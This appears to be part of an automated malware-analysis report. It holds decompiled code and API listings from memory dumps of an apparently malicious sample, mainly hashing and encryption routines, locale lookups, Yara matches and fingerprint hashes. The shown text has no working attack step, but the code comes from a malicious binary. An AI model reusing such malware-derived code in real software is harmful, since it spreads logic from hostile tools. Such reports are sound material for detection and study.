                    					_t425 = 0x16;
                    					_t235 = E105BF480(_v20, _t425);
                    					_t426 = 0xd;
                    					_t236 = E105BF480(_v20, _t426);
                    					_t237 = E105BF480(_v20, _t299);
                    					_t578 = _v28;
                    					_v16 = ((_v12 | _v20) & _v36 | _v12 & _v20) + (_t235 ^ _t236 ^ _t237) + _t520;
                    					_t433 = 0x19;
                    					_t240 = E105BF480(_t578, _t433);
                    					_t434 = 0xb;
                    					_t241 = E105BF480(_t578, _t434);
                    					_t435 = 6;
                    					_t242 = E105BF480(_t578, _t435);
                    					_t243 = _v40;
                    					_t98 = _t243 + 0x4655b4; // 0xe9b5dba5
                    					_t527 = (_t240 ^ _t241 ^ _t242) + ((_v24 ^ _v32) & _t578 ^ _v32) +  *_t98 +  *((intOrPtr*)(_t603 + _v40 - 0x13c)) + _v8;
                    					_v36 = _v36 + _t527;
                    					_t436 = 0x16;
                    					_t244 = E105BF480(_v16, _t436);
                    					_t437 = 0xd;
                    					_t245 = E105BF480(_v16, _t437);
                    					_t246 = E105BF480(_v16, _t299);
                    					_t583 = _v36;
                    					_v8 = ((_v16 | _v20) & _v12 | _v16 & _v20) + (_t244 ^ _t245 ^ _t246) + _t527;
                    					_t444 = 0x19;
                    					_t249 = E105BF480(_t583, _t444);
                    					_t445 = 0xb;
                    					_t250 = E105BF480(_t583, _t445);
                    					_t446 = 6;
                    					_t251 = E105BF480(_t583, _t446);
                    					_t252 = _v40;
                    					_t117 = _t252 + 0x4655b8; // 0x3956c25b
                    					_t534 = (_t249 ^ _t250 ^ _t251) + ((_v24 ^ _v28) & _t583 ^ _v24) +  *_t117 +  *((intOrPtr*)(_t603 + _v40 - 0x138)) + _v32;
                    					_t254 = _v12 + _t534;
                    					_t447 = 0x16;
                    					_v12 = _t254;
                    					_v44 = _t254;
                    					_t255 = E105BF480(_v8, _t447);
                    					_t448 = 0xd;
                    					_t256 = E105BF480(_v8, _t448);
                    					_t454 = ((_v16 | _v8) & _v20 | _v16 & _v8) + (_t255 ^ _t256 ^ E105BF480(_v8, _t299)) + _t534;
                    					_t588 = _v12;
                    					_v32 = _t454;
                    					_v60 = _t454;
                    					_t455 = 0x19;
                    					_t260 = E105BF480(_t588, _t455);
                    					_t456 = 0xb;
                    					_t261 = E105BF480(_t588, _t456);
                    					_t457 = 6;
                    					_t262 = E105BF480(_t588, _t457);
                    					_t263 = _v40;
                    					_t138 = _t263 + 0x4655bc; // 0x59f111f1
                    					_t541 = (_t260 ^ _t261 ^ _t262) + ((_v28 ^ _v36) & _t588 ^ _v28) +  *_t138 +  *((intOrPtr*)(_t603 + _v40 - 0x134)) + _v24;
                    					_t265 = _v20 + _t541;
                    					_t458 = 0x16;
                    					_v20 = _t265;
                    					_v48 = _t265;
                    					_t266 = E105BF480(_v32, _t458);
                    					_t459 = 0xd;
                    					_t267 = E105BF480(_v32, _t459);
                    					_t465 = ((_v32 | _v8) & _v16 | _v32 & _v8) + (_t266 ^ _t267 ^ E105BF480(_v32, _t299)) + _t541;
                    					_t593 = _v20;
                    					_v24 = _t465;
                    					_v64 = _t465;
                    					_t466 = 0x19;
                    					_t271 = E105BF480(_t593, _t466);
                    					_t467 = 0xb;
                    					_t272 = E105BF480(_t593, _t467);
                    					_t468 = 6;
                    					_t273 = E105BF480(_t593, _t468);
                    					_t158 = _v40 + 0x4655c0; // 0x923f82a4
                    					_t548 = (_t271 ^ _t272 ^ _t273) + ((_v36 ^ _v12) & _t593 ^ _v36) +  *_t158 +  *((intOrPtr*)(_t603 + _v40 - 0x130)) + _v28;
                    					_t276 = _v16 + _t548;
                    					_t469 = 0x16;
                    					_v16 = _t276;
                    					_v52 = _t276;
                    					_t277 = E105BF480(_v24, _t469);
                    					_t470 = 0xd;
                    					_t278 = E105BF480(_v24, _t470);
                    					_t476 = ((_v24 | _v32) & _v8 | _v24 & _v32) + (_t277 ^ _t278 ^ E105BF480(_v24, _t299)) + _t548;
                    					_t598 = _v16;
                    					_v28 = _t476;
                    					_v68 = _t476;
                    					_t477 = 0x19;
                    					_t282 = E105BF480(_t598, _t477);
                    					_t478 = 0xb;
                    					_t283 = E105BF480(_t598, _t478);
                    					_t479 = 6;
                    					_t284 = E105BF480(_t598, _t479);
                    					_t285 = _v40;
                    					_t180 = _t285 + 0x4655c4; // 0xab1c5ed5
                    					_t555 = (_t282 ^ _t283 ^ _t284) + ((_v12 ^ _v20) & _t598 ^ _v12) +  *_t180 +  *((intOrPtr*)(_t603 + _v40 - 0x12c)) + _v36;
                    					_t287 = _v8 + _t555;
                    					_t480 = 0x16;
                    					_v8 = _t287;
                    					_v56 = _t287;
                    					_t288 = E105BF480(_v28, _t480);
                    					_t481 = 0xd;
                    					_t289 = E105BF480(_v28, _t481);
                    					_t487 = ((_v24 | _v28) & _v32 | _v24 & _v28) + (_t288 ^ _t289 ^ E105BF480(_v28, _t299)) + _t555;
                    					_t563 = _v12;
                    					_t294 = _v40 + 0x20;
                    					_v40 = _t294;
                    					_t212 = _v8;
                    					_v36 = _t487;
                    					_v72 = _t487;
                    				} while (_t294 < 0x100);
                    				_t295 = _v76;
                    				do {
                    					asm("movups xmm0, [eax]");
                    					asm("movups xmm1, [ecx+eax]");
                    					asm("paddd xmm1, xmm0");
                    					asm("movups [eax], xmm1");
                    					_t295 = _t295 + 0x10;
                    					_t299 = _t299 - 1;
                    				} while (_t299 != 0);
                    				return 0;
                    			}


                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 0
                    • API String ID: 0-4108050209
                    • Opcode ID: d377f04f12ce0f7edea2aff32589f2edccf1a6c013219f9a5b1e8afcee6b3214
                    • Instruction ID: 26ad7a6a090b447b3c1fed40751487fe765c3ea9b2bb3388896d2339e7db0b23
                    • Opcode Fuzzy Hash: d377f04f12ce0f7edea2aff32589f2edccf1a6c013219f9a5b1e8afcee6b3214
                    • Instruction Fuzzy Hash: 3E123B36E112189BDF04CBACD956ABEB7F2EFC8314F25806AD505BB380DA757D418B84
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 0042F9CD
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: FeaturePresentProcessor
                    • String ID:
                    • API String ID: 2325560087-0
                    • Opcode ID: d7609121f321f4e7d9d393e1578f2eb6653ce81b8d693f1216ef69d978b005de
                    • Instruction ID: 1b349e86bd2dcb401b8587f5fe98d601c7c16f63658581765740280450a0f810
                    • Opcode Fuzzy Hash: d7609121f321f4e7d9d393e1578f2eb6653ce81b8d693f1216ef69d978b005de
                    • Instruction Fuzzy Hash: BE41E071A006188BEB14CF55E88579EBBF4FB08314FA0853BD409E7350E3B8A924CF99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: L/B
                    • API String ID: 0-202356071
                    • Opcode ID: 76de492c9c07f0eb7c158ab6622f4411f8f17a6eccbc349bd2954d67055dc0a1
                    • Instruction ID: af44c839d919a06cb4036c0461bacdbed32545edb78db0b7c7cb8e0092a3767b
                    • Opcode Fuzzy Hash: 76de492c9c07f0eb7c158ab6622f4411f8f17a6eccbc349bd2954d67055dc0a1
                    • Instruction Fuzzy Hash: 12E1B330A10028AFCB08CF5DE9A287E73F1FB49301755416EE582E7391DA74FA12EB95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
                      • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
                      • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
                      • Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60
                      • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D41
                      • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D4E
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044A5E7
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$_free$InfoLocale_abort
                    • String ID:
                    • API String ID: 1663032902-0
                    • Opcode ID: 1d23a962e4247796f6940d6c6d10ae8ecf88f37509316fbaa38232d644d664f4
                    • Instruction ID: d815766c36d9954a4c820c073ba9809893cec4c66f47e331b0827f9a13c2a0fe
                    • Opcode Fuzzy Hash: 1d23a962e4247796f6940d6c6d10ae8ecf88f37509316fbaa38232d644d664f4
                    • Instruction Fuzzy Hash: 1F21D03258020AABFB249E25DC86BBB73A8EB04314F14407BF905C6241EB3CED55CB5E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
                      • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
                      • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
                      • Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60
                    • EnumSystemLocalesW.KERNEL32(0044A343,00000001,00000000,?,0043E2C1,?,0044A970,00000000,?,?,?), ref: 0044A28D
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                    • String ID:
                    • API String ID: 1084509184-0
                    • Opcode ID: 3f4933a1a1ee220f0dbad5b64f72dc4827fcab8f9caec66703019ab1352aed1c
                    • Instruction ID: fef6e57728511f2b9b1dd238f7a777dd7648a2b970c096311ec5bc0c4a713da2
                    • Opcode Fuzzy Hash: 3f4933a1a1ee220f0dbad5b64f72dc4827fcab8f9caec66703019ab1352aed1c
                    • Instruction Fuzzy Hash: 3F114C372007055FEB189F39C8916BBB791FF80359B14442DE98647740E7B6B952DB44
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
                      • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
                      • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
                      • Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60
                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0044A561,00000000,00000000,?), ref: 0044A7EF
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$InfoLocale_abort_free
                    • String ID:
                    • API String ID: 2692324296-0
                    • Opcode ID: 1cd820401b6a1c1bbe6edf503f73b5c6d44779daf189f74fcf19ed8e0c0a0003
                    • Instruction ID: 83d8b15de60c056d1b119042d664eee472c135ad5aa1af093dd0495062aa18b7
                    • Opcode Fuzzy Hash: 1cd820401b6a1c1bbe6edf503f73b5c6d44779daf189f74fcf19ed8e0c0a0003
                    • Instruction Fuzzy Hash: 3AF04932990116ABFB246B25CC057BBBB68EB00318F14442AEC05A3240EA38FE62C6D5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
                      • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
                      • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
                      • Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60
                    • EnumSystemLocalesW.KERNEL32(0044A593,00000001,?,?,0043E2C1,?,0044A934,0043E2C1,?,?,?,?,?,0043E2C1,?,?), ref: 0044A302
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                    • String ID:
                    • API String ID: 1084509184-0
                    • Opcode ID: e6193cd3b2cb708b7780c009108bef3b0113aba1580a16d571c1eda4c60849ca
                    • Instruction ID: b467c6c7c7f8ac7ca1ad2f3a7ac430e87e8f1bd3a8912e360415dfb464baff1b
                    • Opcode Fuzzy Hash: e6193cd3b2cb708b7780c009108bef3b0113aba1580a16d571c1eda4c60849ca
                    • Instruction Fuzzy Hash: 28F022323403045FEB149F399C81A6A7B95FF80368B14443EF9418B690E6B6DC419A04
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,105CEB8D,?,00000004), ref: 105D327B
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: InfoLocale
                    • String ID:
                    • API String ID: 2299586839-0
                    • Opcode ID: 30b810839b59ba11a6eae0aeef628e107f6b5eb1dc1d371d29b2301ee2a0ab54
                    • Instruction ID: 43e7c81de9a73a38af273ab33b3e2d7abe4255995a299f0ed590a1ac21dccd6f
                    • Opcode Fuzzy Hash: 30b810839b59ba11a6eae0aeef628e107f6b5eb1dc1d371d29b2301ee2a0ab54
                    • Instruction Fuzzy Hash: BFF0F631A00308BBCF119FB49C06F6E7F25EB44B52F00811AFC0426392CA71AE2097D9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 80%
                    			E105D2D3F(void* __eflags) {
                    				int _t15;
                    				void* _t28;
                    
                    				E105C09CE(0x468310, 0xc);
                    				 *(_t28 - 0x1c) =  *(_t28 - 0x1c) & 0x00000000;
                    				E105CFF4B( *((intOrPtr*)( *((intOrPtr*)(_t28 + 8)))));
                    				 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
                    				 *0x46b728 = E105CE39C( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t28 + 0xc)))))));
                    				_t15 = EnumSystemLocalesW(0x441e8b, 1);
                    				_push(0x20);
                    				asm("ror eax, cl");
                    				 *0x46b728 = 0 ^  *0x46a00c;
                    				 *(_t28 - 0x1c) = _t15;
                    				 *(_t28 - 4) = 0xfffffffe;
                    				E105D2DB7();
                    				return E105C0A14();
                    			}


                    APIs
                      • Part of subcall function 105CFF4B: RtlEnterCriticalSection.NTDLL(?), ref: 105CFF5A
                    • EnumSystemLocalesW.KERNEL32(00441E8B,00000001,00468310,0000000C), ref: 105D2D77
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: CriticalEnterEnumLocalesSectionSystem
                    • String ID:
                    • API String ID: 1272433827-0
                    • Opcode ID: abb4caffa02348ff292c3d88a20ecbb05850758c7100002ad79474d0ec2ca5e8
                    • Instruction ID: 2124d088e411f8c24491bee9914814251905014109d5a5c2ce2af3df439601ea
                    • Opcode Fuzzy Hash: abb4caffa02348ff292c3d88a20ecbb05850758c7100002ad79474d0ec2ca5e8
                    • Instruction Fuzzy Hash: 77F04436510704DFDB00DFB8D846B5D3BF0EB45721F104126F400DB2A1D775A5808F5A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0043F0DD: EnterCriticalSection.KERNEL32(-0046B510,?,0043C874,00000000,00468168,0000000C,0043C82F,00000000,?,?,0043F37B,00000000,?,00441D97,00000001,00000364), ref: 0043F0EC
                    • EnumSystemLocalesW.KERNEL32(00441E8B,00000001,00468310,0000000C), ref: 00441F09
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: CriticalEnterEnumLocalesSectionSystem
                    • String ID:
                    • API String ID: 1272433827-0
                    • Opcode ID: abb4caffa02348ff292c3d88a20ecbb05850758c7100002ad79474d0ec2ca5e8
                    • Instruction ID: dae358490f3c529fc7d89ea536994af86cc47deb2d30d84bb45738c6495eef66
                    • Opcode Fuzzy Hash: abb4caffa02348ff292c3d88a20ecbb05850758c7100002ad79474d0ec2ca5e8
                    • Instruction Fuzzy Hash: DCF03C32A10204EFDB10EF79E856B593BB0EB08725F10412AF410DB2A1DBB999848F5E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
                      • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
                      • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
                      • Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60
                    • EnumSystemLocalesW.KERNEL32(0044A127,00000001,?,?,?,0044A992,0043E2C1,?,?,?,?,?,0043E2C1,?,?,?), ref: 0044A207
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                    • String ID:
                    • API String ID: 1084509184-0
                    • Opcode ID: fa2dd48da86d2843f62e137803b5bb2482421d1c388bbb34657bff8fd84012d4
                    • Instruction ID: a7fadff6d2ca21f630832dc779862bf22c9b6182ed5b4a5894b7910ac126a48e
                    • Opcode Fuzzy Hash: fa2dd48da86d2843f62e137803b5bb2482421d1c388bbb34657bff8fd84012d4
                    • Instruction Fuzzy Hash: 1FF0553A38030557EB049F75DC49B6BBFA0FFC1719F06405AEA058B690C67AD942CB54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00411E51,0046C238,0046C5B4,0046C238,00000000,0046C238,00000000,0046C238,3.2.1 Pro), ref: 0040D1F9
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: InfoLocale
                    • String ID:
                    • API String ID: 2299586839-0
                    • Opcode ID: 4c1a934f5ac5a3c0cab132a0d4aa1abdd1fcf80b677e654e19d5e57048290400
                    • Instruction ID: ac7816e6a697d777cf06a73d6884089d523ece1dfcb51b9ad9a20d9ec724333c
                    • Opcode Fuzzy Hash: 4c1a934f5ac5a3c0cab132a0d4aa1abdd1fcf80b677e654e19d5e57048290400
                    • Instruction Fuzzy Hash: 47D05E7074021DBBEA14D6959C0AEAB7B9CD701B66F0001A6BE04D72C0E9E1AE04C7E1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 0
                    • API String ID: 0-4108050209
                    • Opcode ID: 84d520a0f70926c0a60d58c698a882ed3c5d158336cfdaa718a2f8f638245402
                    • Instruction ID: 656339de93b15354355cc6fc116552e81dda14c8a7802dd6a12fd3361ec49b7a
                    • Opcode Fuzzy Hash: 84d520a0f70926c0a60d58c698a882ed3c5d158336cfdaa718a2f8f638245402
                    • Instruction Fuzzy Hash: AC515170204B495BEF38456844457BFE3989B6E744F18298FFC82D7382CE5EED06825E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 87%
                    			E105B3DC3(signed int* __ecx, intOrPtr __edx) {
                    				signed int _v8;
                    				signed int _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				signed int _v24;
                    				signed int _v28;
                    				char _v32;
                    				signed int _v36;
                    				intOrPtr _v40;
                    				signed int* _v44;
                    				signed int _v48;
                    				signed int _v52;
                    				signed int _v56;
                    				signed int _v60;
                    				intOrPtr _t81;
                    				signed int _t83;
                    				signed int _t87;
                    				signed int _t91;
                    				signed int _t93;
                    				signed int _t97;
                    				unsigned int _t101;
                    				signed int _t105;
                    				signed int _t106;
                    				signed int* _t108;
                    				signed int _t110;
                    				signed int _t111;
                    				signed int _t112;
                    				signed int _t118;
                    				signed int _t124;
                    				signed int _t125;
                    				signed int _t127;
                    				signed int _t129;
                    				char* _t68; /* loop-counter pointer used below; missing from the decompiler's declaration list */
                    
                    				asm("xorps xmm0, xmm0");
                    				_t101 = __ecx[1];
                    				_t124 = __ecx[2];
                    				asm("movlpd [ebp-0x30], xmm0");
                    				_v24 = _v48;
                    				asm("movlpd [ebp-0x38], xmm0");
                    				_v20 = _v52;
                    				_v40 = __edx;
                    				_t110 = __ecx[3];
                    				_v44 = __ecx;
                    				_t105 = 0;
                    				_v16 = _v56;
                    				_v8 =  *__ecx;
                    				_v36 = 0;
                    				_v12 = _v60;
                    				do {
                    					_t81 = _v40;
                    					_v32 = 0x40;
                    					_t118 =  *(_t81 + _t105 * 8);
                    					_v28 =  *((intOrPtr*)(_t81 + 4 + _t105 * 8));
                    					_t83 = _v8;
                    					_t106 = _v28;
                    					do {
                    						_t129 = _t106;
                    						if(_t129 <= 0 && (_t129 < 0 || _t118 < 0)) {
                    							_v12 = _v12 ^ _t83;
                    							_v16 = _v16 ^ _t101;
                    							_v20 = _v20 ^ _t124;
                    							_v24 = _v24 ^ _t110;
                    						}
                    						_t87 = _v8;
                    						if((_t124 & 0x00000001) == 0) {
                    							_t125 = (_t110 << 0x00000020 | _t124) >> 1;
                    							_t111 = _t110 >> 1;
                    							if((_t87 & 0x00000001) == 0) {
                    								asm("xorps xmm0, xmm0");
                    								asm("movlpd [ebp-0x30], xmm0");
                    								_v28 = _v48;
                    								_t91 = _v52;
                    							} else {
                    								_t91 = 0;
                    								_v28 = 0x80000000;
                    							}
                    							_t110 = _t111 | _v28;
                    							_t124 = _t125 | _t91;
                    							_t83 = (_t101 << 0x00000020 | _v8) >> 1;
                    							_t101 = _t101 >> 1;
                    						} else {
                    							_t127 = (_t110 << 0x00000020 | _t124) >> 1;
                    							_t112 = _t110 >> 1;
                    							if((_t87 & 0x00000001) == 0) {
                    								asm("xorps xmm0, xmm0");
                    								asm("movlpd [ebp-0x30], xmm0");
                    								_v28 = _v48;
                    								_t97 = _v52;
                    							} else {
                    								_t97 = 0;
                    								_v28 = 0x80000000;
                    							}
                    							_t110 = _t112 | _v28;
                    							_t124 = _t127 | _t97;
                    							_t83 = (_t101 << 0x00000020 | _v8) >> 0x1 ^ 0x00000000;
                    							_t101 = _t101 >> 0x00000001 ^ 0xe1000000;
                    						}
                    						_t106 = (_t106 << 0x00000020 | _t118) << 1;
                    						_v8 = _t83;
                    						_t118 = _t118 + _t118;
                    						_t68 =  &_v32;
                    						 *_t68 = _v32 - 1;
                    					} while ( *_t68 != 0);
                    					_t105 = _v36 + 1;
                    					_v36 = _t105;
                    				} while (_t105 < 2);
                    				_t108 = _v44;
                    				_t93 = _v12;
                    				_t108[1] = _v16;
                    				_t108[2] = _v20;
                    				_t108[3] = _v24;
                    				 *_t108 = _t93;
                    				return _t93;
                    			}
                    0x105b3dcb
                    0x105b3dcf
                    0x105b3dd3
                    0x105b3dd7
                    0x105b3ddf
                    0x105b3de5
                    0x105b3dea
                    0x105b3df0
                    0x105b3df3
                    0x105b3df6
                    0x105b3df9
                    0x105b3dfb
                    0x105b3e01
                    0x105b3e04
                    0x105b3e07
                    0x105b3e0a
                    0x105b3e0a
                    0x105b3e0d
                    0x105b3e14
                    0x105b3e1b
                    0x105b3e1e
                    0x105b3e21
                    0x105b3e24
                    0x105b3e24
                    0x105b3e26
                    0x105b3e2e
                    0x105b3e31
                    0x105b3e34
                    0x105b3e37
                    0x105b3e37
                    0x105b3e42
                    0x105b3e45
                    0x105b3e8a
                    0x105b3e91
                    0x105b3e96
                    0x105b3ea3
                    0x105b3ea6
                    0x105b3eae
                    0x105b3eb1
                    0x105b3e98
                    0x105b3e98
                    0x105b3e9a
                    0x105b3e9a
                    0x105b3eb4
                    0x105b3eb7
                    0x105b3ebc
                    0x105b3ec0
                    0x105b3e47
                    0x105b3e47
                    0x105b3e4e
                    0x105b3e53
                    0x105b3e60
                    0x105b3e63
                    0x105b3e6b
                    0x105b3e6e
                    0x105b3e55
                    0x105b3e55
                    0x105b3e57
                    0x105b3e57
                    0x105b3e71
                    0x105b3e74
                    0x105b3e7f
                    0x105b3e82
                    0x105b3e82
                    0x105b3ec2
                    0x105b3ec6
                    0x105b3ec9
                    0x105b3ecb
                    0x105b3ecb
                    0x105b3ecb
                    0x105b3ed8
                    0x105b3ed9
                    0x105b3edc
                    0x105b3ee5
                    0x105b3eeb
                    0x105b3eee
                    0x105b3ef4
                    0x105b3efa
                    0x105b3eff
                    0x105b3f05

                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: @
                    • API String ID: 0-2766056989
                    • Opcode ID: afc649a906c918a612c1bf2ed60efbe29a77397457307a03108316727d093398
                    • Instruction ID: 965cf78d2f1780ae571ed71020487231a0bdc7c6eab5c2f1560311203763fc5c
                    • Opcode Fuzzy Hash: afc649a906c918a612c1bf2ed60efbe29a77397457307a03108316727d093398
                    • Instruction Fuzzy Hash: 2641E676D102199BCB44CFA9C98179DFBF6FF88310F25815AE905B3351D375A9828B90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5a62310b6c4938199bce2ab53516f4e3097276e77197fa2db35135d46eaa054e
                    • Instruction ID: 2cb720bef2544e5c06a33a5d17755d7e86d39b9e029a2e5d8d400cd4f85def03
                    • Opcode Fuzzy Hash: 5a62310b6c4938199bce2ab53516f4e3097276e77197fa2db35135d46eaa054e
                    • Instruction Fuzzy Hash: C832F122D29F014DD723A634C832336A249AFB33C6F55C737EC1AB5AB6EB2984C74145
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b641f070c2405a49e1eadb6568e9d2778ebd8eecacbe3dbd9c7f7c2cfa08f05a
                    • Instruction ID: a3281e84da692e2451ecee3bc7ad76d72f52b4e124b9255ecb7e44b2b6ef82ce
                    • Opcode Fuzzy Hash: b641f070c2405a49e1eadb6568e9d2778ebd8eecacbe3dbd9c7f7c2cfa08f05a
                    • Instruction Fuzzy Hash: 16324621D29F014DE7639634C972336A248AFB73C5F19C737F81AB5EA6EB29C4834109
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 96%
                    			E105AB90E(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4, intOrPtr _a8) {
                    				signed char _v7;
                    				signed int _v8;
                    				intOrPtr _v12;
                    				intOrPtr _v16;
                    				signed int _v20;
                    				signed int _v24;
                    				signed int _v28;
                    				signed int _v34;
                    				signed int _v40;
                    				signed int _v44;
                    				signed int _v48;
                    				signed int _v52;
                    				intOrPtr _v56;
                    				intOrPtr _v60;
                    				intOrPtr* _v64;
                    				intOrPtr _v68;
                    				void _v72;
                    				void* __edi;
                    				void* _t251;
                    				void _t254;
                    				signed char _t272;
                    				void* _t274;
                    				intOrPtr _t275;
                    				intOrPtr* _t280;
                    				void* _t281;
